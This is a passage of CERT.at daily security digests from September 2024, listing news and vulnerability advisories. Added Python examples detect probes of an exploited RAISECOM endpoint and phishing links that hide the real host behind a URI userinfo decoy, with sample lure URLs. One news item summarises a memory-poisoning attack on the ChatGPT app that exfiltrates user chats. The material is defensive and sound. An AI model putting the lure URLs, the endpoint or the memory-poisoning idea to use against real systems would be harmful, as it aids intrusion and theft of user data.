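if __name__ == "__main__":
    for ip in ["192.0.2.10", "203.0.113.5", "203.0.113.200", "2001:db8:2::5", "8.8.8.8"]:
        print(ip, country_of(ip), decide(ip))
```

Two caveats the post's approach inherits and this code cannot fix: a country table is only as good as its source and its age, and a motivated attacker can rent bots or VPN exits inside the allowed countries. Geoblocking buys time during an attack; it is not a substitute for rate limiting and caching of the expensive endpoints.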
∗∗∗ Meta fined $101 million for storing hundreds of millions of passwords in plaintext ∗∗∗
---------------------------------------------
European regulators fined Meta for an engineering mistake that the social media giant first reported in 2019.
---------------------------------------------
https://therecord.media/meta-unprotected-passwords-fine-gdpr
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-24-1290: TeamViewer Missing Authentication Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1290/
∗∗∗ ZDI-24-1289: TeamViewer Missing Authentication Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1289/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 25-09-2024 18:00 − Thursday 26-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Talos discovers denial-of-service vulnerability in Microsoft Audio Bus; Potential remote code execution in popular open-source PLC ∗∗∗
---------------------------------------------
Cisco Talos’ Vulnerability Research team recently disclosed two vulnerabilities in Microsoft products that have been patched by the company over the past two Patch Tuesdays. One is a vulnerability in the High-Definition Audio Bus Driver in Windows systems that could lead to a denial of service, while the other is a memory corruption issue that exists in a multicasting protocol in Windows 10. [..] For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
---------------------------------------------
https://blog.talosintelligence.com/talos-discovers-denial-of-service-vulner…
∗∗∗ The Cyber Resilience Act, an Accidental European Alien Torts Statute? ∗∗∗
---------------------------------------------
What if someone is harmed by their own government, but the technology used against them was created by a company based in the United States? Should that person be able to hold the American company responsible?
---------------------------------------------
https://www.lawfaremedia.org/article/the-cyber-resilience-act--an-accidenta…
∗∗∗ Threat landscape for industrial automation systems, Q2 2024 ∗∗∗
---------------------------------------------
In this report, we share statistics on threats to industrial control systems in Q2 2024, including statistics by region, industry, malware and other threat types.
---------------------------------------------
https://securelist.com/industrial-threat-landscape-q2-2024/113981/
∗∗∗ Direct Memory Access (DMA) attacks. Risks, techniques, and mitigations in hardware hacking ∗∗∗
---------------------------------------------
DMA allows input-output (I/O) devices to access memory without CPU involvement. Bypassing the Operating System (OS) by providing direct high-speed access to the system’s memory improves efficiency for Graphics processing units (GPUs), Network Interface Cards (NICs), storage devices (e.g. NVMe) and peripheral devices. DMA capable connections include PCI, PCI Express (PCIe), Thunderbolt, FireWire, ExpressCard. Without additional safeguards, DMA can make systems vulnerable to attacks.
---------------------------------------------
https://www.pentestpartners.com/security-blog/direct-memory-access-dma-atta…
∗∗∗ Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy ∗∗∗
---------------------------------------------
We analyze new tools DPRK-linked APT Sparkling Pisces (aka Kimsuky) used in cyberespionage campaigns: KLogExe (a keylogger) and FPSpy (a backdoor variant).
---------------------------------------------
https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/
∗∗∗ Simple Mail Transfer Pirates: How threat actors are abusing third-party infrastructure to send spam ∗∗∗
---------------------------------------------
Spammers are always looking for creative ways to bypass spam filters. As a spammer, one of the problems with creating your own architecture to deliver mail is that, once the spam starts flowing, these sources (IPs/domains) can be blocked. Spam can more easily find its way into the inbox if it is delivered from an unexpected or legitimate source. Realizing this, many spammers have elected to attack web pages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited email.
---------------------------------------------
https://blog.talosintelligence.com/simple-mail-transfer-pirates/
∗∗∗ Phishing and Social Engineering: The Human Factor in Election Security ∗∗∗
---------------------------------------------
Discover how phishing and social engineering threaten the 2024 U.S. elections in part three of our Election Cybersecurity series. Learn how attackers exploit human vulnerabilities to compromise systems and how to defend against these evolving threats.
---------------------------------------------
https://www.greynoise.io/blog/phishing-and-social-engineering-the-human-fac…
∗∗∗ Dell Hit by Third Data Leak in a Week Amid “grep” Cyberattacks ∗∗∗
---------------------------------------------
Dell faces its third data leak in a week as hacker “grep” continues targeting the tech giant. Sensitive internal files, including project documents and MFA data, were exposed. Dell has yet to issue a formal response.
---------------------------------------------
https://hackread.com/dell-data-leak-in-week-amid-grep-cyberattacks/
=====================
= Vulnerabilities =
=====================
∗∗∗ HPE Aruba Networking fixes critical flaws impacting Access Points ∗∗∗
---------------------------------------------
HPE Aruba Networking has fixed three critical vulnerabilities in the Command Line Interface (CLI) service of its Aruba Access Points, which could let unauthenticated attackers gain remote code execution on vulnerable devices.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hpe-aruba-networking-fixes-t…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (container-tools:rhel8, dovecot, emacs, expat, git-lfs, go-toolset:rhel8, golang, grafana, grafana-pcp, gtk3, kernel, kernel-rt, nano, python3, python3.11, python3.12, and virt:rhel and virt-devel:rhel), Debian (mediawiki and puredata), Fedora (chisel), Mageia (glib2.0, gtk+2.0 and gtk+3.0, and python-astropy), Red Hat (git-lfs, grafana, grafana-pcp, kernel, and kernel-rt), SUSE (kubernetes1.24, kubernetes1.25, kubernetes1.26, kubernetes1.27, kubernetes1.28, opensc, and python36), and Ubuntu (apparmor, apr, ca-certificates, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-raspi, openjpeg2, ruby-rack, and tomcat8, tomcat9).
---------------------------------------------
https://lwn.net/Articles/991897/
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0005 ∗∗∗
---------------------------------------------
Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE identifiers: CVE-2024-23271, CVE-2024-27808, CVE-2024-27820, CVE-2024-27833, CVE-2024-27838, CVE-2024-27851, CVE-2024-40866, CVE-2024-44187
---------------------------------------------
https://webkitgtk.org/security/WSA-2024-0005.html
∗∗∗ Cisco IOS XE Software for Wireless Controllers CWA Pre-Authentication ACL Bypass Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS XE Software Web UI Cross-Site Request Forgery Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS and IOS XE Software Web UI Cross-Site Request Forgery Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 16, 2024 to September 22, 2024) ∗∗∗
---------------------------------------------
https://www.wordfence.com/blog/2024/09/wordfence-intelligence-weekly-wordpr…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 24-09-2024 18:00 − Wednesday 25-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ ChatGPT macOS Flaw Could've Enabled Long-Term Spyware via Memory Function ∗∗∗
---------------------------------------------
A now-patched security vulnerability in OpenAI's ChatGPT app for macOS could have made it possible for attackers to plant long-term persistent spyware into the artificial intelligence (AI) tool's memory. The technique, dubbed SpAIware, could be abused to facilitate "continuous data exfiltration of any information the user typed or responses received by ChatGPT, including any future chat sessions," security researcher Johann Rehberger said.
---------------------------------------------
https://thehackernews.com/2024/09/chatgpt-macos-flaw-couldve-enabled-long.h…
∗∗∗ Again: OpenAI's official Twitter account taken over by crypto scammers ∗∗∗
---------------------------------------------
The official Twitter account of the press office of ChatGPT provider OpenAI was taken over by scammers and used to promote a fake cryptocurrency.
---------------------------------------------
https://heise.de/-9953073
∗∗∗ AI-Generated Malware Found in the Wild ∗∗∗
---------------------------------------------
HP has intercepted an email campaign comprising a standard malware payload delivered by an AI-generated dropper.
---------------------------------------------
https://www.securityweek.com/ai-generated-malware-found-in-the-wild/
∗∗∗ Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz ∗∗∗
---------------------------------------------
Delve into the infrastructure and tactics of phishing platform Sniper Dz, which targets popular brands and social media. We discuss its unique aspects and more.
---------------------------------------------
https://unit42.paloaltonetworks.com/phishing-platform-sniper-dz-unique-tact…
∗∗∗ LummaC2: Obfuscation Through Indirect Control Flow ∗∗∗
---------------------------------------------
This blog post delves into the analysis of a control flow obfuscation technique employed by recent LummaC2 (LUMMAC.V2) stealer samples. In addition to the traditional control flow flattening technique used in older versions, the malware now leverages customized control flow indirection to manipulate the execution of the malware.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscatio…
∗∗∗ Modified LockBit and Conti ransomware shows up in DragonForce gang’s attacks ∗∗∗
---------------------------------------------
The manufacturing, real estate and transportation industries are recent targets of the cybercrime operation known as DragonForce. Researchers say it's serving up versions of LockBit and Conti to affiliates.
---------------------------------------------
https://therecord.media/lockbit-conti-dragonforce-ransomware-cybercrime
∗∗∗ Shedding Light on Election Deepfakes ∗∗∗
---------------------------------------------
Contrary to popular belief, deepfakes — AI-crafted audio files, images, or videos that depict events and statements that never occurred; a portmanteau of “deep learning” and “fake” — are not all intrinsically malicious. [..] Let’s take a look at the state of deepfakes during the 2020 elections, how it’s currently making waves in the 2024 election cycle, and how voters can tell truth from digital deception.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/shedding-li…
=====================
= Vulnerabilities =
=====================
∗∗∗ 20,000 WordPress Sites Affected by Privilege Escalation Vulnerability in WCFM – WooCommerce Frontend Manager WordPress Plugin ∗∗∗
---------------------------------------------
This vulnerability makes it possible for an authenticated attacker to change the email of any user, including an administrator, which allows them to reset the password and take over the account and website. [..] After providing full disclosure details, the developer released a patch on September 23, 2024. [..] CVE ID: CVE-2024-8290
---------------------------------------------
https://www.wordfence.com/blog/2024/09/20000-wordpress-sites-affected-by-pr…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (booth), Gentoo (Xpdf), Oracle (go-toolset:ol8, golang, grafana, grafana-pcp, kernel, libnbd, openssl, pcp, and ruby:3.3), Red Hat (container-tools:rhel8, go-toolset:rhel8, golang, kernel, and kernel-rt), SUSE (apr, cargo-audit, chromium, obs-service-cargo, python311, python36, quagga, traefik, and xen), and Ubuntu (intel-microcode, linux-azure-fde-5.15, and puma).
---------------------------------------------
https://lwn.net/Articles/991701/
∗∗∗ WatchGuard SSO and Moodle ∗∗∗
---------------------------------------------
rt-sa-2024-008: WatchGuard SSO Client Denial-of-Service,
rt-sa-2024-007: WatchGuard SSO Agent Telnet Authentication Bypass,
rt-sa-2024-006: WatchGuard SSO Protocol is Unencrypted and Unauthenticated,
rt-sa-2024-009: Moodle: Remote Code Execution via Calculated Questions
---------------------------------------------
https://www.redteam-pentesting.de/en/advisories/
∗∗∗ TeamViewer: high-risk vulnerabilities allow privilege escalation ∗∗∗
---------------------------------------------
In the TeamViewer remote clients, attackers can abuse insufficient cryptographic verification of driver installations to escalate their privileges and install drivers (CVE-2024-7479, CVE-2024-7481; both CVSS 8.8, risk "high"). [..] Version 15.58.4 or newer, available since Tuesday of this week, closes these vulnerabilities.
---------------------------------------------
https://heise.de/-9953034
∗∗∗ XenServer and Citrix Hypervisor Security Update for CVE-2024-45817 ∗∗∗
---------------------------------------------
https://support.citrix.com/s/article/CTX691646-xenserver-and-citrix-hypervi…
∗∗∗ Vulnerability in BlackBerry CylanceOPTICS Windows installer package ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/schwachstelle-in-blac…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 23-09-2024 18:00 − Tuesday 24-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Hacker attack here, hacker attack there? No. ∗∗∗
---------------------------------------------
A commentary on the current reporting about DDoS attacks against the websites of political parties in Austria.
---------------------------------------------
https://datenrausch.substack.com/p/hackerangriff-hier-hackerangriff
∗∗∗ New Mallox ransomware Linux variant based on leaked Kryptina code ∗∗∗
---------------------------------------------
An affiliate of the Mallox ransomware operation, also known as TargetCompany, was spotted using a slightly modified version of the Kryptina ransomware to attack Linux systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-mallox-ransomware-linux-…
∗∗∗ New Octo Android malware version impersonates NordVPN, Google Chrome ∗∗∗
---------------------------------------------
A new version of the Octo Android malware, named "Octo2," has been seen spreading across Europe under the guise of NordVPN, Google Chrome, and an app called Europe Enterprise.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-octo-android-malware-ver…
∗∗∗ Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th) ∗∗∗
---------------------------------------------
Late in July, a researcher using the alias "NETSECFISH" published a blog post revealing a vulnerability in RAISECOM gateway devices [1]. The vulnerability affects the "vpn/list_base_Config.php" endpoint and allows for unauthenticated remote code execution. According to Shodan, about 25,000 vulnerable devices are exposed to the internet. With a simple proof of concept available, it is no surprise that we see the vulnerability exploited.
---------------------------------------------
https://isc.sans.edu/diary/rss/31292
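Because the endpoint is reachable without authentication, every hit on it from outside your management network is worth a look, whether or not the device answered 200. The following is an added example, not code from the ISC diary or from the researcher: a small detection pass over web server access logs that flags requests to the endpoint named above and summarizes the scanning sources. The log lines are constructed in Combined Log Format for the demo, and no exploit parameters are shown; the path alone is the indicator.

```python
"""Added example: flag requests to the RAISECOM endpoint from access logs.

Assumptions: Combined Log Format input (constructed below); the only
indicator used is the endpoint path named in the ISC diary.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Match case-insensitively and anywhere in the path: probes vary the case and
# the device may sit behind a reverse proxy that adds a prefix.
SUSPICIOUS_PATH = re.compile(r'/vpn/list_base_config\.php', re.IGNORECASE)

# Constructed sample log (documentation-range addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [24/Sep/2024:08:01:12 +0000] "GET /vpn/list_base_Config.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.9 - - [24/Sep/2024:08:01:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Sep/2024:08:01:20 +0000] "POST /VPN/list_base_Config.php HTTP/1.1" 200 128 "-" "curl/8.4.0"
192.0.2.44 - - [24/Sep/2024:08:02:03 +0000] "GET /vpn/list_base_Config.php HTTP/1.1" 404 0 "-" "Go-http-client/1.1"
this line is not a log entry
"""


def parse(line: str):
    """Parse one Combined Log Format line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Return a list of hits on the suspicious endpoint, in log order."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue  # malformed; a real pipeline would count these separately
        if SUSPICIOUS_PATH.search(rec["path"]):
            hits.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "method": rec["method"],
                "status": int(rec["status"]),
                "ua": rec["ua"] or "",
            })
    return hits


def sources(hits) -> Counter:
    """Count hits per source address, to see who is scanning versus exploiting."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} status={h["status"]} ua={h["ua"]}')
    print("sources:", dict(sources(found)))
```

A 200 with a non-trivial body on a device that should not be exposed at all is the finding; a 404 from a host that is not a RAISECOM device still tells you which addresses are sweeping your ranges and belongs in the same blocklist feed. The durable fix is the one the diary implies: the management and VPN interface of such a gateway should not be reachable from the internet in the first place.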
∗∗∗ Investigating Solaris / SunOS - persistence with system processes ∗∗∗
---------------------------------------------
Compared to Windows or even Linux, public knowledge and guidance on digital forensics for Solaris / SunOS is rather thin. During this engagement we expanded our knowledge of Solaris considerably and examined it for various attacker techniques. In this blog post we want to share our experience investigating potential persistence through system processes in connection with MITRE ATT&CK technique T1543.
---------------------------------------------
https://sec-consult.com/de/blog/detail/investigating-solaris-sunos-persiste…
∗∗∗ Deloitte Says No Threat to Sensitive Data After Hacker Claims Server Breach ∗∗∗
---------------------------------------------
A notorious hacker has announced the theft of data from an improperly protected server allegedly belonging to Deloitte. [..] Deloitte says no sensitive data was exposed after a notorious hacker leaked what he claimed to be internal communications.
---------------------------------------------
https://www.securityweek.com/deloitte-says-no-threat-to-sensitive-data-afte…
∗∗∗ Do not apply to leave the church via kirchenaustritt-digital-beantragen.at ∗∗∗
---------------------------------------------
Anyone looking for information on leaving the church quickly ends up at kirchenaustritt-digital-beantragen.at. We advise against applying for your resignation through this paid service, however. According to complaints, the cancellation is not forwarded to the church despite payment. In addition, a great deal of personal data and a copy of an ID document are demanded. We generally advise against handling cancellations and the like through third-party providers.
---------------------------------------------
https://www.watchlist-internet.at/news/kirchenaustritt/
∗∗∗ Inside SnipBot: The Latest RomCom Malware Variant ∗∗∗
---------------------------------------------
We deconstruct SnipBot, a variant of RomCom malware. Its authors, who target diverse sectors, seem to be aiming for espionage instead of financial gain.
---------------------------------------------
https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/
∗∗∗ Hacker Leaks 12,000 Alleged Twilio Call Records with Audio Recordings ∗∗∗
---------------------------------------------
A hacker has leaked 12,000 alleged Twilio call records, including phone numbers and audio recordings. The breach exposes personal data, creating significant privacy risks for businesses and individuals using the service.
---------------------------------------------
https://hackread.com/hacker-leaks-twilio-call-records-audio-recordings/
=====================
= Vulnerabilities =
=====================
∗∗∗ Unpatched Vulnerabilities Expose Riello UPSs to Hacking: Security Firm ∗∗∗
---------------------------------------------
Hackers can take control of Riello UPS devices by exploiting vulnerabilities that likely remain unpatched, according to CyberDanube, an Austria-based firm specializing in industrial cybersecurity.
---------------------------------------------
https://www.securityweek.com/unpatched-vulnerabilities-expose-riello-upss-t…
∗∗∗ CISA Releases Eight Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
ICSA-24-268-01 OPW Fuel Management Systems SiteSentinel,
ICSA-24-268-02 Alisonic Sibylla,
ICSA-24-268-03 Franklin Fueling Systems TS-550 EVO,
ICSA-24-268-04 Dover Fueling Solutions ProGauge MAGLINK LX CONSOLE,
ICSA-24-268-05 Moxa MXview One,
ICSA-24-268-06 OMNTEC Proteus Tank Monitoring,
ICSA-24-156-01 Uniview NVR301-04S2-P4 (Update A),
ICSA-19-274-01 Interpeak IPnet TCP/IP Stack (Update E)
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/09/24/cisa-releases-eight-indu…
∗∗∗ Zyxel security advisory for post-authentication memory corruption vulnerabilities in some DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router versions ∗∗∗
---------------------------------------------
Zyxel has released patches for some DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router versions affected by post-authentication memory corruption vulnerabilities. Users are advised to install them for optimal protection. (CVE-2024-38266 CVE-2024-38267 CVE-2024-38268 CVE-2024-38269)
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
∗∗∗ Critical Vulnerabilities Discovered in Automated Tank Gauge Systems ∗∗∗
---------------------------------------------
In this blogpost, we will explore the ATG systems, their inherent risk when exposed to the Internet and the several critical vulnerabilities uncovered by Bitsight TRACE. By understanding these vulnerabilities, we hope that the reader can better appreciate the urgent need for enhanced security measures and the steps that need to be taken to protect these systems from exploitation.
---------------------------------------------
https://www.bitsight.com/blog/critical-vulnerabilities-discovered-automated…
∗∗∗ Xen Security Advisory CVE-2024-45817 / XSA-462 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-462.html
∗∗∗ Keycloak Security Update Advisory (CVE-2024-8698) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/83325/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 20-09-2024 18:00 − Monday 23-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Hyper-V and VMware: vulnerabilities, patches, PoCs ∗∗∗
---------------------------------------------
A vulnerability in Hyper-V was recently patched; a proof of concept (PoC) for it is now available. VMware also has vulnerabilities, along with information on how to break out of the VM.
---------------------------------------------
https://www.borncity.com/blog/2024/09/23/hyper-v-und-vmware-schwachstellen-…
∗∗∗ Android malware Necro infects 11 million devices via Google Play ∗∗∗
---------------------------------------------
A new version of the Necro Trojan malware for Android was installed on 11 million devices through Google Play in malicious SDK supply chain attacks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/android-malware-necro-infect…
∗∗∗ Global infostealer malware operation targets crypto users, gamers ∗∗∗
---------------------------------------------
A massive infostealer malware operation encompassing thirty campaigns targeting a broad spectrum of demographics and system platforms has been uncovered, attributed to a cybercriminal group named "Marko Polo."
---------------------------------------------
https://www.bleepingcomputer.com/news/security/global-infostealer-malware-o…
∗∗∗ Phishing links with @ sign and the need for effective security awareness building, (Mon, Sep 23rd) ∗∗∗
---------------------------------------------
While going over a batch of phishing e-mails that were delivered to us here at the Internet Storm Center during the first half of September, I noticed one message which was somewhat unusual. Not because it was untypically sophisticated or because it used some completely new technique, but rather because its authors took advantage of one of the less commonly misused aspects of the URI format – the ability to specify information about a user in the URI before its "host" part (domain or IP address).
---------------------------------------------
https://isc.sans.edu/diary/rss/31288
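The trick the diary above describes is the userinfo part of a URI: everything between `//` and the last `@` in the authority is user information, and the host is whatever follows. A victim reads `https://login.microsoft.com@evil.example/...` as a Microsoft link, but the browser connects to `evil.example`. The following is an added example, not code from the diary or from ISC, that parses links the way a client does and flags any that carry userinfo; all domains and the mail body are constructed for illustration.

```python
# Added example (not code from the ISC diary above): how the userinfo part of
# a URL lets a phishing link display a trusted-looking name before the "@"
# while the browser actually connects to whatever host follows it.
# All domains below are constructed for illustration.
import re
from typing import Optional
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def effective_host(url: str) -> str:
    """Host the client will really connect to (userinfo stripped, lowercased)."""
    return (urlsplit(url).hostname or "").lower()


def userinfo_lure(url: str) -> Optional[dict]:
    """Return details if the URL carries userinfo (anything before '@' in the
    authority), which is the trick described above; None otherwise."""
    parts = urlsplit(url)
    if parts.username is None and parts.password is None:
        return None
    # Everything before the last '@' in the authority is what a victim reads
    # as the destination; per RFC 3986 it is userinfo, not the host.
    decoy = parts.netloc.rsplit("@", 1)[0]
    return {"url": url, "decoy": decoy, "real_host": effective_host(url)}


def scan_text(text: str) -> list:
    """Extract http(s) links from a mail body and return the suspicious ones."""
    findings = []
    for match in URL_RE.finditer(text):
        url = match.group(0).rstrip(".,;:)")  # drop trailing sentence punctuation
        hit = userinfo_lure(url)
        if hit:
            findings.append(hit)
    return findings


# Constructed sample message body (not a real phishing mail).
SAMPLE_MAIL = """\
Your mailbox is almost full. Review it at
https://login.microsoft.com@evil.example/owa/auth now.
Documentation: https://docs.example.com/mailbox-quota
Shared file: http://guest:guest@files.example.net/share
"""

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_MAIL):
        print(f"{hit['url']}\n  looks like: {hit['decoy']}\n  connects to: {hit['real_host']}")
```

Note that an `@` in the path, query or fragment (for example `https://evil.example/#@login.microsoft.com`) is not userinfo and does not change the host; the check deliberately looks only at the authority, which is what a browser does. Links with embedded credentials (`user:pass@host`) are flagged too, since legitimate mail rarely carries them.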
∗∗∗ Staying a Step Ahead: Mitigating the DPRK IT Worker Threat ∗∗∗
---------------------------------------------
This report aims to increase awareness of the DPRK's efforts to obtain employment as IT workers and shed light on their operational tactics for obtaining employment and maintaining access to corporate systems. Understanding these methods can help organizations better detect these sorts of suspicious behaviors earlier in the hiring process.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it…
∗∗∗ Why Do Criminals Love Phishing-as-a-Service Platforms? ∗∗∗
---------------------------------------------
Phishing-as-a-Service (PaaS) platforms have become the go-to tool for cybercriminals, to launch sophisticated phishing campaigns targeting the general public and businesses, especially in the financial services sector. [..] In this blog, we’ll explore the key features offered by PaaS platforms, highlight the major platforms Trustwave SpiderLabs has recently observed, and cover effective phishing mitigation strategies.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/why-do-crim…
∗∗∗ CISA boss: Makers of insecure software are enablers of the real villains ∗∗∗
---------------------------------------------
Software suppliers who ship buggy, insecure code are the true baddies in the cyber crime story, Jen Easterly, boss of the US government's Cybersecurity and Infrastructure Security Agency, has argued. "The truth is: Technology vendors are the characters who are building problems" into their products, which then "open the doors for villains to attack their victims," declared Easterly during a Wednesday keynote address at Mandiant's mWise conference.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/09/20/cisa_sloppy_…
∗∗∗ Proxy Detection: Comparing Detection Services with the Truth ∗∗∗
---------------------------------------------
In our previous blog post, we looked at different (free and paid) solutions to detect the use of anonymity tools during attacks executed on our Remote Desktop Protocol (RDP) honeypots. Confronted with inconclusive outcomes, this blog post aims to evaluate the different proxy detector tools by analyzing their results with our dataset of Truth.
---------------------------------------------
https://gosecure.ai/blog/2024/09/23/proxy-detection-comparing-detection-ser…
∗∗∗ Hackers Claim Second Dell Data Breach in One Week ∗∗∗
---------------------------------------------
Hackers claim a second Dell data breach within a week, exposing sensitive internal files via compromised Atlassian tools. Allegedly, data from Jira, Jenkins, and Confluence was leaked. Dell is already investigating the first incident.
---------------------------------------------
https://hackread.com/dell-hit-by-second-security-breach-in-week/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (expat, fence-agents, firefox, libnbd, openssl, pcp, ruby:3.3, and thunderbird), Debian (ruby-saml), Fedora (aardvark-dns, chromium, expat, jupyterlab, less, openssl, python-jupyterlab-server, python-notebook, python3-docs, and python3.12), Gentoo (calibre, curl, Emacs, org-mode, Exo, file, GPL Ghostscript, gst-plugins-good, liblouis, Mbed TLS, OpenVPN, Oracle VirtualBox, PJSIP, Portage, PostgreSQL, pypy, pypy3, Rust, Slurm, stb, VLC, and Xen), SUSE (container-suseconnect, ffmpeg-4, kernel, libpcap, python3, python310, python36, and wpa_supplicant), and Ubuntu (firefox, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux-azure, and linux-ibm-5.15, linux-oracle-5.15).
---------------------------------------------
https://lwn.net/Articles/991377/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 19-09-2024 18:00 − Friday 20-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Ever wonder how crooks get the credentials to unlock stolen phones? ∗∗∗
---------------------------------------------
iServer provided a simple service for phishing credentials to unlock phones.
---------------------------------------------
https://arstechnica.com/?p=2051165
∗∗∗ CISA warns of actively exploited Apache HugeGraph-Server bug ∗∗∗
---------------------------------------------
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five flaws to its Known Exploited Vulnerabilities (KEV) catalog, among which is a remote code execution (RCE) flaw impacting Apache HugeGraph-Server.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-explo…
∗∗∗ macOS Sequoia change breaks networking for VPN, antivirus software ∗∗∗
---------------------------------------------
Users of macOS 15 Sequoia are reporting network connection errors when using certain endpoint detection and response (EDR) or virtual private network (VPN) solutions, and web browsers.
---------------------------------------------
https://www.bleepingcomputer.com/news/apple/macos-sequoia-change-breaks-net…
∗∗∗ 1 In 10 Orgs Dumping Their Security Vendors After CrowdStrike Outage ∗∗∗
---------------------------------------------
An anonymous reader quotes a report from The Register: Germany's Federal Office for Information Security (BSI) says one in ten organizations in the country affected by CrowdStrike's outage in July are dropping their current vendor's products. Four percent of organizations have already abandoned their existing solutions, while a further 6 percent plan to ..
---------------------------------------------
https://it.slashdot.org/story/24/09/19/1721236/1-in-10-orgs-dumping-their-s…
∗∗∗ SAP Hash Cracking Techniques ∗∗∗
---------------------------------------------
Hashing is a one-way technique (not encryption: there is no key and nothing to decrypt) employed to ensure data integrity, authenticate information, and protect passwords and other sensitive data. Hash functions map input data to a fixed-size string of characters in a uniform and deterministic way, which makes them well suited to these tasks.
---------------------------------------------
https://redrays.io/blog/sap-hash-cracking-techniques/
∗∗∗ This Windows PowerShell Phish Has Scary Potential ∗∗∗
---------------------------------------------
Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it's unlikely that many programmers fell for this ..
---------------------------------------------
https://krebsonsecurity.com/2024/09/this-windows-powershell-phish-has-scary…
∗∗∗ Ivanti Warns of Second CSA Vulnerability Exploited in Attacks ∗∗∗
---------------------------------------------
In addition to the Ivanti CSA flaw CVE-2024-8190, another vulnerability affecting the same product, tracked as CVE-2024-8963, has been exploited.
---------------------------------------------
https://www.securityweek.com/ivanti-warns-of-second-csa-vulnerability-explo…
∗∗∗ Noise Storms: Massive Amounts of Spoofed Web Traffic Linked to China ∗∗∗
---------------------------------------------
